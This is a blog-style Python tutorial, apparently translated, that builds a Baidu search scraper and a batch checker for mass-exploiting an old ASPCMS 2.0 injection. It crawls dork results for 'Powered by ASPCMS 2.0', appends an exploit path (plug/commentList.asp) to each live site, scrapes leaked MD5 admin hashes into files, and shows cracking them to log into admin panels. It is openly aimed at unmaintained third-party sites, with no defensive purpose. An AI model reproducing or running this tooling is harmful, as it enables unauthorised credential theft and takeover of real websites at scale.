This article shows how to use a URL collector together with exp verification in Python. The walkthrough is concise and easy to follow; I hope you get something out of it.
Foreword:
In recent days I have been sorting through the toolkits I have collected from all over, large and small, filling more than a dozen gigabytes of disk, and I stumbled across a 0day from several years ago. On a whim I tried it, and to my surprise it still works; the affected sites are old and unmaintained, so the hit rate is quite considerable. That made me want to pair it with a URL collector and write a batch exp script, hence today's article. Attached at the end is a forum invitation code (I accidentally bought too many); first come, first served.
Getting started: environment and modules used:
Python 3
requests
BeautifulSoup (bs4)
hashlib
As usual, let's define the goals first:
We need to write a URL collector to gather target URLs.
We need to integrate our exp into it.
Let's take a look at the format of exp, which looks something like this:
Exp:xxx/xxx/xxx/xxx
Baidu keyword: xxxxxx
Usage: append the exp to the site's URL and it directly dumps the admin account's password.
Like this: www.baidu.com/xxx/xxx/xxxxxxxxx
PS: the xxx placeholders used later in our code stand in for this exp.
Here is another screenshot of the result. Yes, that's it: the account and password come straight out.
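In other words, the exploitation step is just string splicing: take a site's URL and append the exp path. A tiny sketch with placeholder values (the base URL and path below are made up, not the real exp):

# tiny sketch of the splicing step; both values below are placeholders, not the real exp
base_url = 'http://www.example-target.com'      # a crawled site's home page (made up)
exp_path = '/xxx/xxx/xxxxxxxxx'                 # stands in for the real exp path
test_url = base_url + exp_path                  # the URL we open to check for leaked credentials
print(test_url)                                 # http://www.example-target.com/xxx/xxx/xxxxxxxxx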
URL acquisition module:
First we need to write a URL collector based on Baidu search, so let's analyze how Baidu's search URLs work.
Open Baidu and enter a search keyword; here I use "mango" as a stand-in.
You can see that the wd parameter carries our keyword. Now click through to the second page to see which parameter controls the page number.
Okay, compared with the previous URL, the pn parameter has become 10. Opening the third and fourth pages shows the pattern: the page-number parameter starts at 0 and increases by 10 per page. Let's change pn to 90 and see whether that takes us to page 10.
It really is page 10, which confirms the idea. The URL we end up with looks like this:
https://www.baidu.com/s?wd=mango&pn=0
We can drop everything after the pn parameter, which simplifies things a lot.
Let's start writing code. We need a main function that opens the Baidu results page, with a for loop controlling the page-number variable so we can open every page of results.
To begin, we just open a single page of the site.
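A minimal sketch of what that first attempt might look like (a bare request with no headers yet, using "mango" as the keyword):

import requests
from bs4 import BeautifulSoup as bs

def main():
    url = 'https://www.baidu.com/s?wd=mango&pn=0'   # page 1 of the search results for "mango"
    r = requests.get(url)            # no headers yet, so Baidu will not return the real results
    soup = bs(r.content, 'lxml')
    print(soup)

if __name__ == '__main__':
    main()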
Run it and you will find that the returned page looks like this: it does not contain what we want.
Why? Because Baidu has an anti-crawling check in place. Don't worry, we just need to send a headers parameter along with the request. The modified code is as follows:
def main():
    url = 'https://www.baidu.com/s?wd=mango&pn=0'   # define the url
    # Baidu has an anti-crawling check: without a User-Agent it returns an error page
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
    r = requests.get(url=url, headers=headers)      # request the target URL
    soup = bs(r.content, 'lxml')                    # parse the page with bs
    print(soup)
Now the page content is returned successfully.
OK, let's add the loop so it traverses every results page. With that, a simple crawler is written, although it does not extract anything yet. Here is the code so far:
import requests
from bs4 import BeautifulSoup as bs   # alias the module as bs so it is shorter to call later

def main():
    for i in range(0, 750, 10):        # iterate over the result pages; pn increases by 10 per page
        url = 'https://www.baidu.com/s?wd=mango&pn=%s' % (str(i))   # define the url
        # Baidu's anti-crawling check requires a User-Agent, otherwise an error page is returned
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
        r = requests.get(url=url, headers=headers)   # request the target URL
        soup = bs(r.content, 'lxml')                 # parse the page with bs
        print(soup)

if __name__ == '__main__':
    main()   # call the main function
Next we analyze the page and pull out each URL. Right-click and inspect an element to find where the result links sit in the source code.
As you can see, the data we want lives inside <a> tags. We use bs to pull out all of these tags, then loop over them and read the URL from the "href" attribute. The main function now looks like this:
def main():
    for i in range(0, 750, 10):
        url = 'https://www.baidu.com/s?wd=mango&pn=%s' % (str(i))
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
        r = requests.get(url=url, headers=headers)
        soup = bs(r.content, 'lxml')
        # pull out the <a> tags we want: re.compile('.') matches any data-click value
        # (add "import re" at the top), and 'class': None keeps out the Baidu snapshot links
        urls = soup.find_all(name='a', attrs={'data-click': re.compile('.'), 'class': None})
        for url in urls:
            print(url['href'])   # take the link out of the href attribute
A note on why 'class': None is there: without it we would also pick up the addresses of Baidu's cached snapshots. The snapshot links carry a class attribute with a value, while the real result links have no class attribute at all, so filtering on 'class': None keeps the snapshot links out.
Run it, and it successfully returns the links we want.
The next step is to verify that these links are actually reachable, because some sites still show up in search results but can no longer be opened. We use requests to fetch each link and check whether the returned status code is 200; if it is, the site is up and can be opened.
Add the following two lines of code to the for loop and run.
r_get_url = requests.get(url=url['href'], headers=headers, timeout=4)   # request the crawled link, with a 4-second timeout
print(r_get_url.status_code)
You can see that successful requests return 200. Next we want to print only the home-page URL of each site that can be accessed. Let's analyze a sample URL:
https://www.xxx.com/xxx/xxxx/
Notice that the URL is delimited by "/", so we can split it on "/" and take out the part we want.
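A quick sketch of what that split produces, using the sample URL above:

url_para = 'https://www.xxx.com/xxx/xxxx/'
parts = url_para.split('/')
print(parts)                          # ['https:', '', 'www.xxx.com', 'xxx', 'xxxx', '']
print(parts[0] + '//' + parts[2])     # https://www.xxx.com  (scheme plus host, i.e. the home page)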
If you run the program as it stands, you will find that some of the returned URLs still contain directory paths.
After splitting the URL on "/", the first element of the list is the protocol and the third is the host, which is the home-page address we want. The code is as follows:
def main():
    for i in range(0, 750, 10):
        url = 'https://www.baidu.com/s?wd=mango&pn=%s' % (str(i))
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
        r = requests.get(url=url, headers=headers)
        soup = bs(r.content, 'lxml')
        # pull out the <a> tags we want; 'class': None filters out the Baidu snapshot links
        urls = soup.find_all(name='a', attrs={'data-click': re.compile('.'), 'class': None})
        for url in urls:
            r_get_url = requests.get(url=url['href'], headers=headers, timeout=4)   # request the crawled link, 4-second timeout
            if r_get_url.status_code == 200:               # keep only links that open normally
                url_para = r_get_url.url                   # the final URL after redirects
                url_index_tmp = url_para.split('/')        # split the URL on '/'
                url_index = url_index_tmp[0] + '//' + url_index_tmp[2]   # reassemble scheme + host into the home-page URL
                print(url_index)
After running it, we successfully extract the home-page URLs we want.
OK, at this point our main function is done. Now for the exciting part: adding the exp and taking over sites in batches.
Exp module
How do we implement this? The idea is to append our exp to each crawled link, splicing them into a complete address, then save the resulting URLs in a txt file for later verification. Our code now looks like this:
# -*- coding: utf-8 -*-
import requests
import re
from bs4 import BeautifulSoup as bs

def main():
    for i in range(0, 750, 10):
        expp = "/xxx/xxx/xxx/xx/xxxx/xxx"   # the exp path (redacted here as xxx)
        url = 'https://www.baidu.com/s?wd=xxxxxxxxx&pn=%s' % (str(i))   # the Baidu keyword is redacted as well
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
        r = requests.get(url=url, headers=headers)
        soup = bs(r.content, 'lxml')
        urls = soup.find_all(name='a', attrs={'data-click': re.compile('.'), 'class': None})
        for url in urls:
            r_get_url = requests.get(url=url['href'], headers=headers, timeout=4)
            if r_get_url.status_code == 200:
                url_para = r_get_url.url
                url_index_tmp = url_para.split('/')
                url_index = url_index_tmp[0] + '//' + url_index_tmp[2]
                with open('cs.txt') as f:
                    # deduplicate: only write the URL if it is not already in the file,
                    # then append the spliced exp link
                    if url_index not in f.read():
                        print(url_index)
                        f2 = open('cs.txt', 'a')
                        f2.write(url_index + expp + '\n')
                        f2.close()

if __name__ == '__main__':
    f2 = open('cs.txt', 'w')   # create (or empty) the result file first
    f2.close()
    main()
I have replaced the exp with xxx here, so substitute your own; the real one is at the end of the article.
Run the program and a cs.txt file appears in the script's directory; opened, it looks like this.
The screenshot is rather heavily redacted, but that doesn't matter; it's a minor issue as long as the idea comes across. In fact, we could stop here and verify manually, pasting and visiting the links one by one to see whether they return what we want. But I'm lazy, and verifying them one by one would take forever.
So here we create a new .py file to verify the links grabbed in the previous step. Keeping the two modules separate also means you can use just the URL-collection part on its own.
The idea is to open each collected link and check whether the page contains the specific content we are looking for. If it does, the link is saved to a file; those are the links verified as exploitable.
Let's look at what a successfully exploited page looks like.
And here is a page where exploitation failed.
Notice that the successful page contains the administrator's password hash. So we check whether the page contains an MD5-style hash; if it does, we print it out and save it together with the link in a text file. First, let's look at the page source so we know what to extract.
You can see that the page is very simple. The content we want sits in two divs with different class values, one with class "line1" and one with class "line2". All we have to do is use bs to extract the contents of those two tags. The code is as follows:
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup as bs
import requests
import re

def expp():
    f = open("cs.txt", "r")          # open the text file we just collected
    urls = f.readlines()             # read our links line by line
    for i in urls:                   # loop over the collected links
        i = i.strip()                # drop the trailing newline
        try:                         # exception handling: a failed request is simply skipped and does not stop the program
            r = requests.get(i, timeout=5)        # request the URL
            if r.status_code == 200:              # make sure the page opens normally (already verified earlier, so this check could be dropped)
                soup = bs(r.text, "lxml")         # parse the page with bs
                if re.search(r'[a-fA-F0-9]{32}', r.text):   # only continue if the page contains an MD5-style hash (32 hex characters)
                    mb1 = soup.find_all(name="div", attrs={"class": "line1"})[0].text   # get the line1 data
                    mb2 = soup.find_all(name="div", attrs={"class": "line2"})[0].text   # get the line2 data
                    f2 = open('cs2.txt', 'a')     # open our result file
                    f2.write(i + "\n" + mb1 + "\n")   # save the verified link and its data to the text file
                    f2.close()
                    print(mb1)
                    print(mb2)
        except:
            pass
    f.close()

expp()
Run it:
Success. Let's take a look at the output file.
Perfect. Now we can crack the hashes and log into the admin back end; you know the rest.
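"Cracking" the MD5 here just means testing candidate passwords against it. A minimal sketch with hashlib, using a made-up hash and a tiny made-up wordlist:

import hashlib

dumped_md5 = '5f4dcc3b5aa765d61d8327deb882cf99'      # sample hash for illustration (md5 of "password")
wordlist = ['123456', 'admin888', 'password']        # a tiny made-up wordlist

for candidate in wordlist:
    if hashlib.md5(candidate.encode('utf-8')).hexdigest() == dumped_md5:
        print('cracked: %s' % candidate)             # prints "cracked: password" for this sample hash
        break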
Exp: the ASPCMS 2.0 injection in plug/commentList.asp (this is what the xxx placeholders above stand for)
Baidu keyword: Powered by ASPCMS 2.0
Summary:
1. Python 2's poor handling of Chinese encodings pushed me to switch to Python 3.
2. The program is simple; what matters is not the program itself but the line of thinking.
That is how to use a URL collector with exp verification in Python. I hope you picked up something useful from the walkthrough.